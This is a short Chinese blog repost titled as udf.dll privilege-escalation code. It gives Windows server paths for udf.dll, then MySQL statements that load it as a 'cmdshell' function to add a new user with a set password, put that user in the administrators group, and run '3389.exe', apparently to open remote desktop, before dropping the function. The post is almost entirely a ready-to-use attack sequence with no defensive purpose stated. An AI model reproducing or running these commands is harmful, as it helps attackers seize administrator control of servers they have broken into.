udf.dll提权代码

      C:\Winnt\udf.dll    2000
  C:\Windows\udf.dll 2003
  现在基本上win的服务器就这两个导出UDF.DLL
  create function cmdshell returns string soname 'udf.dll'
  select cmdshell('net user admins 226404553 /add');
  select cmdshell('net localgroup administrators admins /add');
  select cmdshell('c:\3389.exe');
  drop function cmdshell; 删除函数
  select cmdshell('netstat -an'); 


文章来自: 网络
引用通告地址: http://www.cn-sohu.com/bolg/trackback.asp?tbID=195
Tags:
评论: 0 | 引用: 115 | 查看次数: 371
发表评论
你没有权限发表留言!
分享到: